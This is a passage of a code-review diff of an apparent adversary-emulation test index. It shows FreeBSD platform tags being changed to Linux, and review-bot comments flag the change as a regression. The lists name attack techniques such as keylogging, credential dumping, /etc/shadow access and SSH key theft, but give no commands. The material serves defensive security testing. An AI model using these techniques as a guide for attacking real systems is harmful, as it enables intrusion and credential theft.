- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
|
||||
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
|
||||
- [T1573 Encrypted Channel](../../T1573/T1573.md)
|
||||
- Atomic Test #1: OpenSSL C2 [windows]
|
||||
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
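Review bot: `Atomic Test #5: Tor Proxy Usage - FreeBSD` under `[linux]` leaves T1090.003 with two Linux-tagged Tor tests (#3 Debian/Ubuntu and #5) that target different operating systems. Note also that `Atomic Test #2: Testing usage of uncommonly used port` drops freebsd from its list rather than being retagged, so after the merge T1571 has no FreeBSD coverage at all; the regeneration fix above covers both.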
@@ -1806,14 +1806,14 @@
|
||||
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
|
||||
- Atomic Test #1: Malicious User Agents - Powershell [windows]
|
||||
- Atomic Test #2: Malicious User Agents - CMD [windows]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
|
||||
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
|
||||
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #3: scp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
- Atomic Test #7: certutil download (urlcache) [windows]
|
||||
- Atomic Test #8: certutil download (verifyctl) [windows]
|
||||
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
|
||||
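Review bot: the six rsync, scp and sftp tests under T1105 lose freebsd from `[freebsd, linux, macos]` on one side; these are platform-neutral tools, so nothing about the tests justifies the narrower list and this is pure coverage loss from the generator issue noted above.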
@@ -1821,7 +1821,7 @@
|
||||
- Atomic Test #11: OSTAP Worming Activity [windows]
|
||||
- Atomic Test #12: svchost writing a file to a UNC path [windows]
|
||||
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
|
||||
- Atomic Test #14: whois file download [freebsd, linux, macos]
|
||||
- Atomic Test #14: whois file download [linux, macos]
|
||||
- Atomic Test #15: File Download via PowerShell [windows]
|
||||
- Atomic Test #16: File download with finger.exe on Windows [windows]
|
||||
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
|
||||
@@ -1840,7 +1840,7 @@
|
||||
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
|
||||
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
|
||||
- Atomic Test #1: Connection Proxy [linux, macos]
|
||||
- Atomic Test #2: Connection Proxy for macOS UI [macos]
|
||||
- Atomic Test #3: portproxy reg key [windows]
|
||||
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1855,17 +1855,17 @@
|
||||
- Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
|
||||
- Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
|
||||
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
|
||||
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
|
||||
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
|
||||
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
|
||||
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #1: Screencapture [macos]
|
||||
- Atomic Test #2: Screencapture (silent) [macos]
|
||||
- Atomic Test #3: X Windows Capture [linux]
|
||||
- Atomic Test #4: X Windows Capture (freebsd) [freebsd]
|
||||
- Atomic Test #4: X Windows Capture (freebsd) [linux]
|
||||
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
|
||||
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [freebsd]
|
||||
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
|
||||
- Atomic Test #7: Windows Screencapture [windows]
|
||||
- Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows]
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -1873,8 +1873,8 @@
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- Atomic Test #8: MacOS Swift Keylogger [macos]
|
||||
@@ -1890,7 +1890,7 @@
|
||||
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
|
||||
- Atomic Test #1: Stage data from Discovery.bat [windows]
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [freebsd]
|
||||
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
|
||||
- Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
|
||||
- [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
@@ -1913,10 +1913,10 @@
|
||||
- [T1005 Data from Local System](../../T1005/T1005.md)
|
||||
- Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows]
|
||||
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
|
||||
- T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1560 Archive Collected Data](../../T1560/T1560.md)
|
||||
- Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
|
||||
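Review bot: the four T1560.002 test names say `(FreeBSD/Linux)` while one side tags them `[linux]` only; the name and the tag must agree, so either keep `[freebsd, linux]` or rename. Since these exercise Python's gzip, bz2, zipfile and tarfile modules they have no OS dependency and should legitimately list both platforms.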
@@ -2010,14 +2010,14 @@
|
||||
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
|
||||
- Atomic Test #3: Logging bash history to syslog [linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [freebsd]
|
||||
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
|
||||
- Atomic Test #4: Logging sh history to syslog/messages [linux]
|
||||
- Atomic Test #5: Bash session based keylogger [linux]
|
||||
- Atomic Test #6: SSHD PAM keylogger [linux]
|
||||
- Atomic Test #7: Auditd keylogger [linux]
|
||||
- Atomic Test #8: MacOS Swift Keylogger [macos]
|
||||
@@ -2028,7 +2028,7 @@
|
||||
- Atomic Test #4: Password Brute User using Kerbrute Tool [windows]
|
||||
- Atomic Test #5: SUDO Brute Force - Debian [linux]
|
||||
- Atomic Test #6: SUDO Brute Force - Redhat [linux]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [freebsd]
|
||||
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
|
||||
- [T1003 OS Credential Dumping](../../T1003/T1003.md)
|
||||
- Atomic Test #1: Gsecdump [windows]
|
||||
- Atomic Test #2: Credential Dumping with NPPSpy [windows]
|
||||
@@ -2066,13 +2066,13 @@
|
||||
- T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
|
||||
- Atomic Test #1: Dump individual process memory with sh (Local) [linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [freebsd]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux]
|
||||
- Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
|
||||
- Atomic Test #3: Dump individual process memory with Python (Local) [linux]
|
||||
- Atomic Test #4: Capture Passwords with MimiPenguin [linux]
|
||||
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #5: Windows Internal Packet Capture [windows]
|
||||
@@ -2080,8 +2080,8 @@
|
||||
- Atomic Test #7: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
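Review bot: `/dev/bpfN` is the BSD packet-filter device node, which Linux does not provide, so `Packet Capture FreeBSD using /dev/bpfN with sudo` and its filtered variant (tests #10 and #11) under `[linux]` name a device that cannot exist on the tagged platform. This is the clearest case in the diff where the `[linux]` tag is factually wrong rather than a lost platform; same fix as above.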
@@ -2131,13 +2131,13 @@
|
||||
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md)
|
||||
- Atomic Test #1: Private Keys [windows]
|
||||
- Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux]
|
||||
- Atomic Test #2: Discover Private SSH Keys [linux, macos]
|
||||
- Atomic Test #3: Copy Private SSH Keys with CP [linux]
|
||||
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [freebsd]
|
||||
- Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux]
|
||||
- Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux]
|
||||
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [freebsd]
|
||||
- Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux]
|
||||
- Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux]
|
||||
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [freebsd]
|
||||
- Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux]
|
||||
- Atomic Test #9: ADFS token signing and encryption certificates theft - Local [windows]
|
||||
- Atomic Test #10: ADFS token signing and encryption certificates theft - Remote [windows]
|
||||
- Atomic Test #11: CertUtil ExportPFX [windows]
|
||||
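Review bot: `Copy the users GnuPG directory with rsync` (tests #7 and #8, both sides) should read `user's`; fix it in the YAML name. The `(freebsd)` copies of tests #4, #6 and #8 under `[linux]` are the same regression, and each would then duplicate its Linux sibling on a Linux host.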
@@ -2181,14 +2181,14 @@
|
||||
- Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
|
||||
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- Atomic Test #2: Search Through sh History [freebsd]
|
||||
- Atomic Test #2: Search Through sh History [linux]
|
||||
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
|
||||
- Atomic Test #1: Find AWS credentials [freebsd, macos, linux]
|
||||
- Atomic Test #1: Find AWS credentials [macos, linux]
|
||||
- Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
|
||||
- Atomic Test #3: Extract passwords with grep [freebsd, macos, linux]
|
||||
- Atomic Test #3: Extract passwords with grep [linux, macos]
|
||||
- Atomic Test #4: Extracting passwords with findstr [windows]
|
||||
- Atomic Test #5: Access unattend.xml [windows]
|
||||
- Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux]
|
||||
- Atomic Test #6: Find and Access Github Credentials [linux, macos]
|
||||
- Atomic Test #7: WinPwn - sensitivefiles [windows]
|
||||
- Atomic Test #8: WinPwn - Snaffler [windows]
|
||||
- Atomic Test #9: WinPwn - powershellsensitive [windows]
|
||||
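Review bot: within this hunk the retagged platform lists are not ordered consistently: `Find AWS credentials` becomes `[macos, linux]` while `Extract passwords with grep` and `Find and Access Github Credentials` become `[linux, macos]`. If the generator sorts platforms it is not doing so here, and if it preserves YAML order the three tests should be normalized so the index stays diffable.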
@@ -2216,7 +2216,7 @@
|
||||
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
|
||||
- Atomic Test #1: SSH Credential Stuffing From Linux [linux]
|
||||
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
|
||||
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [freebsd]
|
||||
- Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux]
|
||||
- Atomic Test #4: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
|
||||
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
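Review bot: `Brute Force:Credential Stuffing using Kerbrute Tool` is missing the space after the colon; fix it in the YAML name. `SSH Credential Stuffing From FreeBSD` under `[linux]` is the same regression and leaves two Linux-tagged SSH stuffing tests (#1 and #3) that differ only in the OS they were written for.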
@@ -2229,10 +2229,10 @@
|
||||
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md)
|
||||
- Atomic Test #1: Access /etc/shadow (Local) [linux]
|
||||
- Atomic Test #2: Access /etc/master.passwd (Local) [freebsd]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux]
|
||||
- Atomic Test #2: Access /etc/master.passwd (Local) [linux]
|
||||
- Atomic Test #3: Access /etc/passwd (Local) [linux]
|
||||
- Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux]
|
||||
- Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux]
|
||||
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
|
||||
- Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
|
||||
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
|
||||
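Review bot: `/etc/master.passwd` exists on FreeBSD, not on Linux, so `Access /etc/master.passwd (Local)` tagged `[linux]` fails with a missing file on every Linux host, and tests #3 to #5 drop freebsd from their lists on the same side. Like the `/dev/bpfN` hunk, this shows the retagging is factually wrong rather than cosmetic and should block the merge until the index is regenerated with freebsd support.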
@@ -2273,7 +2273,7 @@
|
||||
# discovery
|
||||
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
|
||||
- Atomic Test #1: System Owner/User Discovery [windows]
|
||||
- Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #2: System Owner/User Discovery [linux, macos]
|
||||
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
|
||||
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
|
||||
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
|
||||
@@ -2316,20 +2316,20 @@
|
||||
- Atomic Test #23: Active Directory Domain Search [linux]
|
||||
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux]
|
||||
- Atomic Test #2: View sudoers access [freebsd, linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos]
|
||||
- Atomic Test #4: List opened files by user [freebsd, linux, macos]
|
||||
- Atomic Test #1: Enumerate all accounts (Local) [linux]
|
||||
- Atomic Test #2: View sudoers access [linux, macos]
|
||||
- Atomic Test #3: View accounts with UID 0 [linux, macos]
|
||||
- Atomic Test #4: List opened files by user [linux, macos]
|
||||
- Atomic Test #5: Show if a user account has ever logged in remotely [linux]
|
||||
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [freebsd]
|
||||
- Atomic Test #7: Enumerate users and groups [freebsd, linux, macos]
|
||||
- Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
|
||||
- Atomic Test #7: Enumerate users and groups [linux, macos]
|
||||
- Atomic Test #8: Enumerate users and groups [macos]
|
||||
- Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
|
||||
- Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
|
||||
- Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
|
||||
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
|
||||
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
|
||||
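Review bot: T1087.001 Atomic Test #6 "Show if a user account has ever logged in remotely (freebsd)" and T1497.001 Atomic Test #2 "Detect Virtualization Environment (FreeBSD)" are now tagged [linux], which contradicts the OS named in each test and makes them duplicates of the Linux siblings listed right above them (#5 and #1). Keep the freebsd tag on these or rename them, but do not ship an index that lists two "linux" tests distinguished only by a BSD suffix.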
@@ -2353,10 +2353,10 @@
|
||||
- Atomic Test #1: System Service Discovery [windows]
|
||||
- Atomic Test #2: System Service Discovery - net.exe [windows]
|
||||
- Atomic Test #3: System Service Discovery - systemctl [linux]
|
||||
- Atomic Test #4: System Service Discovery - service [freebsd]
|
||||
- Atomic Test #4: System Service Discovery - service [linux]
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd]
|
||||
- Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux]
|
||||
- Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos]
|
||||
- Atomic Test #4: Packet Capture Windows Command Prompt [windows]
|
||||
- Atomic Test #5: Windows Internal Packet Capture [windows]
|
||||
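Review bot: T1007 Atomic Test #4 "System Service Discovery - service" and T1040 Atomic Test #2 "Packet Capture FreeBSD using tshark or tcpdump" switch from [freebsd] to [linux], so T1040 now lists two [linux] capture tests (#1 and #2) that differ only by the OS in their names. Please restore the freebsd tag for the FreeBSD-named entry or fold the two into one test.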
@@ -2364,8 +2364,8 @@
|
||||
- Atomic Test #7: Windows Internal pktmon set filter [windows]
|
||||
- Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd]
|
||||
- Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux]
|
||||
- Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
|
||||
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
|
||||
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
|
||||
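Review bot: T1040 Atomic Tests #10 and #11 capture through /dev/bpfN and are retagged from [freebsd] to [linux], but Linux has no /dev/bpfN device nodes; raw capture on Linux goes through AF_PACKET sockets, which Tests #12 through #14 in this same hunk already cover. As tagged, #10 and #11 cannot succeed on the platform they claim, so this looks like a generator artifact rather than an intended change.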
@@ -2373,7 +2373,7 @@
|
||||
- [T1135 Network Share Discovery](../../T1135/T1135.md)
|
||||
- Atomic Test #1: Network Share Discovery [macos]
|
||||
- Atomic Test #2: Network Share Discovery - linux [linux]
|
||||
- Atomic Test #3: Network Share Discovery - FreeBSD [freebsd]
|
||||
- Atomic Test #3: Network Share Discovery - FreeBSD [linux]
|
||||
- Atomic Test #4: Network Share Discovery command prompt [windows]
|
||||
- Atomic Test #5: Network Share Discovery PowerShell [windows]
|
||||
- Atomic Test #6: View available share drives [windows]
|
||||
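Review bot: T1135 Atomic Test #3 "Network Share Discovery - FreeBSD" becomes [linux], leaving it next to Test #2 "Network Share Discovery - linux [linux]" as a second linux entry whose name says otherwise. Please keep the freebsd platform on #3.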
@@ -2387,16 +2387,16 @@
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #1: System Information Discovery [windows]
|
||||
- Atomic Test #2: System Information Discovery [macos]
|
||||
- Atomic Test #3: List OS Information [freebsd, linux, macos]
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
- Atomic Test #4: Linux VM Check via Hardware [linux]
|
||||
- Atomic Test #5: Linux VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [freebsd]
|
||||
- Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux]
|
||||
- Atomic Test #7: Hostname Discovery (Windows) [windows]
|
||||
- Atomic Test #8: Hostname Discovery [freebsd, linux, macos]
|
||||
- Atomic Test #8: Hostname Discovery [linux, macos]
|
||||
- Atomic Test #9: Windows MachineGUID Discovery [windows]
|
||||
- Atomic Test #10: Griffon Recon [windows]
|
||||
- Atomic Test #11: Environment variables discovery on windows [windows]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux]
|
||||
- Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos]
|
||||
- Atomic Test #13: Show System Integrity Protection status (MacOS) [macos]
|
||||
- Atomic Test #14: WinPwn - winPEAS [windows]
|
||||
- Atomic Test #15: WinPwn - itm4nprivesc [windows]
|
||||
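Review bot: T1082 Atomic Test #12 is still named "Environment variables discovery on freebsd, macos and linux" but its platforms shrink to [linux, macos], and Test #6 "FreeBSD VM Check via Kernel Modules" now duplicates Test #5 "Linux VM Check via Kernel Modules" under [linux]. Note also that the lists here are re-sorted ([freebsd, macos, linux] becomes [linux, macos]), which points to a regenerated index rather than hand edits; confirm the generator still knows the freebsd platform.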
@@ -2410,7 +2410,7 @@
|
||||
- Atomic Test #23: WinPwn - PowerSharpPack - Seatbelt [windows]
|
||||
- Atomic Test #24: Azure Security Scan with SkyArk [azure-ad]
|
||||
- Atomic Test #25: Linux List Kernel Modules [linux]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [freebsd]
|
||||
- Atomic Test #26: FreeBSD List Kernel Modules [linux]
|
||||
- Atomic Test #27: System Information Discovery with WMIC [windows]
|
||||
- Atomic Test #28: Driver Enumeration using DriverQuery [windows]
|
||||
- Atomic Test #29: System Information Discovery [windows]
|
||||
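Review bot: T1082 Atomic Test #26 "FreeBSD List Kernel Modules" is retagged [linux] and now sits beside Test #25 "Linux List Kernel Modules [linux]" as an apparent duplicate. Restore [freebsd] on #26.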
@@ -2423,10 +2423,10 @@
|
||||
- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
|
||||
- Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws]
|
||||
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux]
|
||||
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
|
||||
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
|
||||
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [freebsd]
|
||||
- Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux]
|
||||
- Atomic Test #5: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
|
||||
- Atomic Test #6: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
|
||||
- Atomic Test #7: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
|
||||
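Review bot: T1217 Atomic Test #1 keeps "on FreeBSD/Linux" in its name while dropping to [linux], and Test #4 "List Google Chromium Bookmark JSON Files on FreeBSD" is now [linux] despite being FreeBSD-specific by name. Either the names or the tags are wrong after this change; please reconcile them with the test YAML.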
@@ -2436,7 +2436,7 @@
|
||||
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
|
||||
- Atomic Test #2: List Windows Firewall Rules [windows]
|
||||
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
|
||||
- Atomic Test #4: System Network Configuration Discovery (freebsd) [freebsd]
|
||||
- Atomic Test #4: System Network Configuration Discovery (freebsd) [linux]
|
||||
- Atomic Test #5: System Network Configuration Discovery (TrickBot Style) [windows]
|
||||
- Atomic Test #6: List Open Egress Ports [windows]
|
||||
- Atomic Test #7: Adfind - Enumerate Active Directory Subnet Objects [windows]
|
||||
